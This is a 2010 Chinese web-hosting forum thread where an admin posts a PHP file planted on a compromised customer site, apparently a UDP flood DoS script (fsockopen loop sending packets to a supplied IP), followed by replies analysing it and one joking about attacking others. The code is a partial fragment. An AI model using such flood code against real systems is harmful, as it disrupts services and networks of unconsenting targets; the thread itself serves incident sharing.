发一个php 攻击代码.大家注意.

诡谲

今天收到服务商的警告.说有outgoing dos attack.并给了几个IP让我检查.
检查后发现一个用户的网站应该是被挂马,许多目录下存在这样一个文件: xss1.php,里面的内容如下:[ol]

$max_time){                break;        }               

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);        

if($fp){                fwrite($fp, $out);               

fclose($fp);        }}

echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>[/ol]复制代码请勿用于非法用途

[ 本帖最后由 诡谲 于 2010-12-4 12:19 编辑 ]

cnx

表示看不懂代码的我路过。

hz555

这个应该不是马吧！都是代码！没连接地址！

tc101

用socket而已，可以禁用的。

wdlth

难道这是dos？？

yugan300

这个是被挂的马吧？
相当于个小“僵尸”了，呵呵，接受黑客的URL输入参数IP向该IP的端口发UDP Flood攻击。。
网站有上传功能的应该小心。

[ 本帖最后由 liheyuan 于 2010-12-4 12:30 编辑 ]

小白

这是端口扫描。

liheyuan

呃，看错了，看到65535就自动默认了。。第一行：这个程序不限时，一直执行完毕
第二行：这个程序不理会使用者是否关闭浏览器，都会在服务器端执行完毕
后面是fsockopen提交。。。。

去D别人的吧

zllovesuki

还是隐藏吧。无聊的人太多了

zllovesukimslxd

学习中，